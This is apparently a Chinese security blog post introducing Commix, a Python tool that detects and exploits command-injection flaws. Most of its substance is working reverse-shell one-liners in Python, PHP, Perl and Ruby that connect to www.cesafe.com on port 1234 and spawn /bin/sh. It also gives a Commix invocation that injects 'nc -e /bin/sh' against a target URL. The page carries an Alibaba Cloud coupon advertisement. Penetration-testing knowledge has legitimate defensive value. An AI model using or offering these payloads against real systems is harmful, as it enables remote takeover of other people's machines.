Commix 自动化命令注入测试与利用工具

  • A+
所属分类:网络安全工具
阿里代金券


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

Commix 自动化命令注入测试与利用工具

项目简介:

Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。

在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:

1. Python-reverse-shell:

  1. python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"www.cesafe.com\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'

2. PHP-reverse-shell:

  1. php-r'\$sock=fsockopen(\"www.cesafe.com\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'

3. Perl-reverse-shell:

  1. perl-e'use Socket;\$i=\"www.cesafe.com\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'

4. Ruby-reverse-shell:

  1. ruby-rsocket-e'exit if fork;c=TCPSocket.new(\"www.cesafe.com\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'

使用方法:

  1. root@kali:~/commix# python commix.py --url="http://www.cesafe.com/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh www.cesafe.com 1234"

下载地址

部分内容被隐藏
评论刷新后查看
CE安全网

发表评论

您必须登录才能发表评论!